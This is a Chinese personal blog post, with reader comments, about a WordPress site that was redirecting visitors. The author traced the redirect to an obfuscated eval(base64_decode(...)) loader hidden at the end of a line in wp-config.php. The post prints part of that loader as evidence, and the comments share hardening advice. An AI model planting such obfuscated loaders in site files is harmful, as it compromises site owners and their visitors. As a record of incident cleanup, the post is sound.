博客被黑

三月 6, 2012

前几天博客被谷歌列入 blacklist,用火狐去访问时老是给出警告,奇怪的是我用 IE 或者手机浏览器访问却是完全正常的。(后来我才明白,这是谷歌特有的黑名单制度哇)。忍受了好几天之后,受不了啦,决定去修复一下。

网上好多人都是说这种现象可能是 .htaccess 文件被篡改了,我去看了下,完全正常。

然后,又看了 wp-config.php, wp-load.php, wp-setting.php,也正常啊。

问小张客服,回答说“主题被挂马的可能性很大”,让“换个主题试试”,但是换了主题,问题依旧~

既然我的页面总是被重定向到 xxxxx.com 网站,我把整个网站目录下载下来,然后用 grep 命令搜索 xxxxx.com 字符串,却啥也没搜到。像是幽灵一样的神秘。

最后找到老外的救星了:

仔细检查了一下 wp-config.php,终于发现在第一行后面有如下诡异的代码:

eval(base64_decode('Ul9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzd
...省略...
ZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9');

难怪用 grep 搜索不到了,现在黑客都学聪明了,居然把恶意代码加密了。那个乱七八糟的字符串解密之后果然就包含有 xxxxx.com 这个网站。

可是为什么我刚开始看 wp-config.php 没看出来呢?黑客也确实狡猾,这个代码虽然很长,却全部都是写在一行里面的,而且缩进很深,我的文本编辑器又设为不自动换行,于是这些代码全部躲在第一行末尾,我居然都没看到!

果断删除之,世界恢复清净。

可惜对于这个权限为644的文件,黑客究竟是怎么写入的,我还是不清楚哇

posted in Life by billzt

Follow comments via the RSS Feed | Leave a comment | Trackback URL

说点什么

9 评论 在 "博客被黑"

提醒
排序:   最新 | 最旧 | 得票最多
游客

这黑客也太厉害了!

游客

@清风, 算是用了一点比较高明的雕虫小技,我以前没经验应付

游客

🙁 被黑过好几次了,慢慢都有对付的经验了

游客

我还没被黑过,没这种经验,怎么办?

游客

@jiechic, (1)及时把 wordpress 更新到最新版本(2)插件不要乱装(3)仔细检查wp-*.php之类的文件的权限

游客

居然写到Wp-config了。。。
不过以前修改主题的时候,倒是用base64解码过footer.php

游客

@Mucid, 网上说写入Wp-config也是一个比较常见的攻击手段,只是刚开始我没仔细检查

游客

清除了就好,呵呵。

游客

有时数据库也会被污染的。常备份吧,xml格式导出也不错。

wpDiscuz
 

Copyright © 2010-2017 | Powered by Wordpress and MySQL. Theme by Shlomi Noach, openark.org